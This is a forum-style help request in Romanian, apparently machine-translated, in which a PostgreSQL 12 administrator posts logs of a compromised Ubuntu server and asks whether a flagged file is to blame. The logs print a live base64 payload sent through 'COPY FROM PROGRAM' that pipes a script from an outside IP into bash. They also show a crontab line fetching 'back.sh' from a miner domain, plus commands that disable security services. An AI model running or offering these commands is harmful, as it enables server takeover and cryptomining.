Folosesc ubuntu 18.04 și postgresql 12,
Vezi jurnalctl mai jos:
Dec 16 09:39:19 server sudo[55084]: postgres : TTY=necunoscut ; PWD=/var/lib/postgresql/12/main ; UTILIZATOR=rădăcină ; COMANDĂ=/usr/sbin/sysctl kernel.nmi_watchdog=0
16 decembrie 09:39:19 server sudo[55084]: pam_unix(sudo:session): sesiune deschisă pentru utilizator root de (uid=0)
16 decembrie 09:39:19 server sudo[55084]: pam_unix(sudo:session): sesiune închisă pentru utilizator root
16 decembrie 09:39:24 server crontab[56537]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56539]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56543]: (postgres) LIST (postgres)
16 dec 09:39:24 server crontab[56545]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56547]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56550]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56552]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56553]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56555]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56556]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56558]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56559]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56561]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56562]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56564]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56565]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56567]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56568]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56570]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56571]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56573]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56574]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56576]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56577]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56579]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56580]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56582]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56583]: (postgres) LIST (postgres)
16 dec 09:39:24 server crontab[56585]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56586]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56588]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56589]: (postgres) LIST (postgres)
16 dec 09:39:24 server crontab[56591]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56592]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56594]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56595]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56597]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56598]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56600]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56601]: (postgres) LIST (postgres)
16 dec 09:39:24 server crontab[56603]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56604]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56606]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56607]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56609]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56610]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56612]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56613]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56615]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56616]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56618]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56619]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56621]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56622]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56624]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56625]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56627]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56628]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56630]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56631]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56633]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56634]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56636]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56637]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56639]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56640]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56642]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56643]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56645]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56646]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56648]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56649]: (postgres) LIST (postgres)
16 decembrie 09:39:24 server crontab[56651]: (postgres) REPLACE (postgres)
16 decembrie 09:39:24 server crontab[56652]: (postgres) LIST (postgres)
16 decembrie 09:39:25 server crontab[56654]: (postgres) REPLACE (postgres)
16 decembrie 09:39:25 server crontab[56655]: (postgres) LIST (postgres)
16 decembrie 09:39:25 server crontab[56657]: (postgres) REPLACE (postgres)
16 decembrie 09:39:25 server crontab[56658]: (postgres) LIST (postgres)
16 decembrie 09:39:25 server crontab[56660]: (postgres) REPLACE (postgres)
16 decembrie 09:39:25 server crontab[56661]: (postgres) LIST (postgres)
16 decembrie 09:39:25 server crontab[56663]: (postgres) REPLACE (postgres)
16 decembrie 09:39:25 server crontab[56664]: (postgres) LIST (postgres)
16 decembrie 09:39:25 server crontab[56666]: (postgres) REPLACE (postgres)
16 decembrie 09:39:25 server crontab[56667]: (postgres) LIST (postgres)
16 decembrie 09:39:25 server crontab[56669]: (postgres) REPLACE (postgres)
16 decembrie 09:39:25 server crontab[56670]: (postgres) LIST (postgres)
16 dec 09:39:25 server crontab[56672]: (postgres) REPLACE (postgres)
16 decembrie 09:39:25 server crontab[56673]: (postgres) LIST (postgres)
16 decembrie 09:39:25 server crontab[56675]: (postgres) REPLACE (postgres)
16 decembrie 09:39:25 server crontab[56676]: (postgres) LIST (postgres)
16 decembrie 09:39:25 server crontab[56678]: (postgres) REPLACE (postgres)
16 decembrie 09:39:25 server crontab[56679]: (postgres) LIST (postgres)
16 decembrie 09:39:25 server crontab[56681]: (postgres) REPLACE (postgres)
16 decembrie 09:39:25 server crontab[56682]: (postgres) LIST (postgres)
16 decembrie 09:39:25 server crontab[56684]: (postgres) REPLACE (postgres)
16 decembrie 09:39:25 server crontab[56685]: (postgres) LIST (postgres)
16 decembrie 09:39:25 server crontab[56687]: (postgres) REPLACE (postgres)
16 decembrie 09:39:25 server crontab[56688]: (postgres) LIST (postgres)
16 decembrie 09:39:25 server crontab[56690]: (postgres) REPLACE (postgres)
16 decembrie 09:39:25 server postgresql@12-main[56691]: Clusterul nu rulează.
16 decembrie 09:39:25 server systemd[1]: [email protected]: Procesul de control a fost ieșit, cod=ieșit, stare=2/INVALIDARGUMENT
16 decembrie 09:39:25 server systemd[1]: [email protected]: a eșuat cu rezultatul „exit-code”.
Jurnalele pentru această perioadă:
rm: nu se poate elimina „/var/log/syslog”: Permisiune refuzată
chattr: Permisiune refuzată în timp ce setați steaguri pe /tmp/
chattr: Permisiune refuzată în timp ce setați steaguri pe /var/tmp/
chattr: Permisiune refuzată în timp ce setați steaguri pe /var/spool/cron
chattr: Permisiune refuzată în timp ce setați steaguri pe /etc/crontab
EROARE: Trebuie să fii root pentru a rula acest script
Fatal: nu se poate deschide fișierul de blocare /run/xtables.lock: Permisiune refuzată
bash: linia 12: /proc/sys/kernel/nmi_watchdog: Permisiune refuzată
bash: linia 13: /etc/sysctl.conf: Permisiune refuzată
userdel: utilizatorul „în regulă” nu există
userdel: utilizatorul „vfinder” nu există
chattr: Permisiune refuzată în timp ce încercați să stati /root/.ssh/
chattr: Permisiune refuzată în timp ce încercați să stati /root/.ssh/authorized_keys
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
cat: /tmp/.X11-unix/01: Nu există un astfel de fișier sau director
cat: /tmp/.X11-unix/11: Nu există un astfel de fișier sau director
cat: /tmp/.X11-unix/22: Nu există un astfel de fișier sau director
cat: /tmp/.pg_stat.0: Nu există un astfel de fișier sau director
cat: /tmp/.pg_stat.1: Nu există un astfel de fișier sau director
cat: /data/./oka.pid: Nu există un astfel de fișier sau director
2021-12-16 09:39:20.212 +06 [54731] LOG: a primit cerere de oprire inteligentă
2021-12-16 09:39:20.222 +06 [54731] LOG: lucrător de fundal „lansatorul de replicare logică” (PID 54738) a ieșit cu codul de ieșire 1
grep: bară oblică inversă
kill: (16): Operațiunea nu este permisă
kill: (56000): Nu există un astfel de proces
kill: (56005): Nu există un astfel de proces
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
(Nu toate procesele au putut fi identificate, informații despre proces nedeținute
nu va fi afișat, ar trebui să fiți root pentru a vedea totul.)
Nu s-a oprit c3pool_miner.service: Acces refuzat
Consultați jurnalele de sistem și „starea systemctl c3pool_miner.service” pentru detalii.
log_rot: nu a fost găsit niciun proces
chattr: Nu există un astfel de fișier sau director în timp ce încercați să stati /etc/ld.so.preload
rm: nu se poate elimina „/opt/atlassian/confluence/bin/1.sh”: nu există un astfel de fișier sau director
rm: nu se poate elimina „/opt/atlassian/confluence/bin/1.sh.1”: nu există un astfel de fișier sau director
rm: nu se poate elimina „/opt/atlassian/confluence/bin/1.sh.2”: nu există un astfel de fișier sau director
rm: nu se poate elimina „/opt/atlassian/confluence/bin/1.sh.3”: nu există un astfel de fișier sau director
rm: nu se poate elimina „/opt/atlassian/confluence/bin/3.sh”: nu există un astfel de fișier sau director
rm: nu se poate elimina „/opt/atlassian/confluence/bin/3.sh.1”: nu există un astfel de fișier sau director
rm: nu se poate elimina „/opt/atlassian/confluence/bin/3.sh.2”: nu există un astfel de fișier sau director
rm: nu se poate elimina „/opt/atlassian/confluence/bin/3.sh.3”: nu există un astfel de fișier sau director
rm: nu se poate elimina „/var/tmp/lib”: Nu există un astfel de fișier sau director
rm: nu se poate elimina „/var/tmp/.lib”: Nu există un astfel de fișier sau director
chattr: Nu există un astfel de fișier sau director în timp ce încercați să stati /etc/ld.so.preload
rm: nu se poate elimina „/opt/atlassian/confluence/bin/1.sh”: nu există un astfel de fișier sau director
rm: nu se poate elimina „/opt/atlassian/confluence/bin/1.sh.1”: nu există un astfel de fișier sau director
rm: nu se poate elimina „/opt/atlassian/confluence/bin/1.sh.2”: nu există un astfel de fișier sau director
rm: nu se poate elimina „/opt/atlassian/confluence/bin/1.sh.3”: nu există un astfel de fișier sau director
rm: nu se poate elimina „/opt/atlassian/confluence/bin/3.sh”: nu există un astfel de fișier sau director
rm: nu se poate elimina „/opt/atlassian/confluence/bin/3.sh.1”: nu există un astfel de fișier sau director
rm: nu se poate elimina „/opt/atlassian/confluence/bin/3.sh.2”: nu există un astfel de fișier sau director
rm: nu se poate elimina „/opt/atlassian/confluence/bin/3.sh.3”: nu există un astfel de fișier sau director
rm: nu se poate elimina „/var/tmp/lib”: Nu există un astfel de fișier sau director
rm: nu se poate elimina „/var/tmp/.lib”: Nu există un astfel de fișier sau director
chattr: Nu există un astfel de fișier sau director în timp ce încercați să stati /tmp/lok
chmod: nu poate accesa „/tmp/lok”: Nu există un astfel de fișier sau director
bash: linia 545: docker: comanda nu a fost găsită
bash: linia 546: docker: comanda nu a fost găsită
bash: linia 547: docker: comanda nu a fost găsită
bash: linia 548: docker: comanda nu a fost găsită
bash: linia 549: docker: comanda nu a fost găsită
bash: linia 550: docker: comanda nu a fost găsită
bash: linia 551: docker: comanda nu a fost găsită
bash: linia 552: docker: comanda nu a fost găsită
bash: linia 553: docker: comanda nu a fost găsită
bash: linia 554: docker: comanda nu a fost găsită
bash: linia 555: docker: comanda nu a fost găsită
bash: linia 556: docker: comanda nu a fost găsită
bash: linia 557: docker: comanda nu a fost găsită
bash: linia 558: docker: comanda nu a fost găsită
bash: linia 559: docker: comanda nu a fost găsită
bash: linia 560: docker: comanda nu a fost găsită
bash: linia 561: docker: comanda nu a fost găsită
bash: linia 562: docker: comanda nu a fost găsită
bash: linia 563: docker: comanda nu a fost găsită
bash: linia 564: docker: comanda nu a fost găsită
bash: linia 565: docker: comanda nu a fost găsită
bash: linia 566: docker: comanda nu a fost găsită
bash: linia 567: setenforce: comanda nu a fost găsită
bash: linia 568: /etc/selinux/config: Permisiune refuzată
Nu s-a putut opri apparmor.service: Acces refuzat
Consultați jurnalele de sistem și „systemctl status apparmor.service” pentru detalii.
Sincronizarea stării apparmor.service cu scriptul de serviciu SysV cu /lib/systemd/systemd-sysv-install.
Se execută: /lib/systemd/systemd-sysv-install disable apparmor
Nu s-a reîncărcat demonul: Acces refuzat
update-rc.d: eroare: Permisiune refuzată
Nu s-a putut opri aliyun.service.service: Acces refuzat
Consultați jurnalele de sistem și „starea systemctl aliyun.service.service” pentru detalii.
Unitatea nu a putut fi dezactivată: acces refuzat
/tmp/kinsing este 648effa354b3cbaad87b45f48d59c616
2021-12-16 09:39:25.123 +06 [55065] postgres@postgres FATAL: terminarea conexiunii din cauza comenzii administratorului
2021-12-16 09:39:25.123 +06 [55065] postgres@postgres CONTEXT: COPY opwcztav, linia 1: „kernel.nmi_watchdog = 0”
2021-12-16 09:39:25.123 +06 [55065] postgres@postgres STATEMENT: DROP TABLE IF EXISTS OPWczTav;CREATE TABLE OPWczTav(cmd_output text);COPY OPWczTav FROM PROGRAM 'echo IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIDE4NS4yNTAuMTQ4LjIxNy9wZy5zaHxiYXNoCmVsaWYgWyAteCAiJChjb21tYW5kIC12IHdnZXQpIiBdOyB0aGVuCiAgd2dldCAtcSAtTy0gMTg1LjI1MC4xNDguMjE3L3BnLnNofGJhc2gKZWxzZQogIF9fY3VybCBodHRwOi8vMTg1LjI1MC4xNDguMjE3L3BnMi5z aHxiYXNoCmZp|base64 -d|bash';SELECT * FROM OPWczTav;DROP TABLE IF EXISTIS OPWczTav;
2021-12-16 09:39:25.142 +06 [54733] LOG: închidere
2021-12-16 09:39:25.167 +06 [54731] Jurnal: sistemul de baze de date este oprit
Am scanat sistemul cu ClamAV, a găsit un fișier malware în cale /var/lib/postgresql/12/main/a
.
Conținutul său:
bind: Operațiunea nu este permisă
cmd: echo "*/30 * * * * /var/lib/postgresql/12/main/./oka" > /tmp/a;echo "* */6 * * * wget -q -O- http:/ /xmr.linux1213.ru:2019/back.sh | sh">> /tmp/a; crontab /tmp/a;rm -rf /tmp/a
începe monitorul
Conectarea a eșuat, returnează: -1
este o sursa de probleme?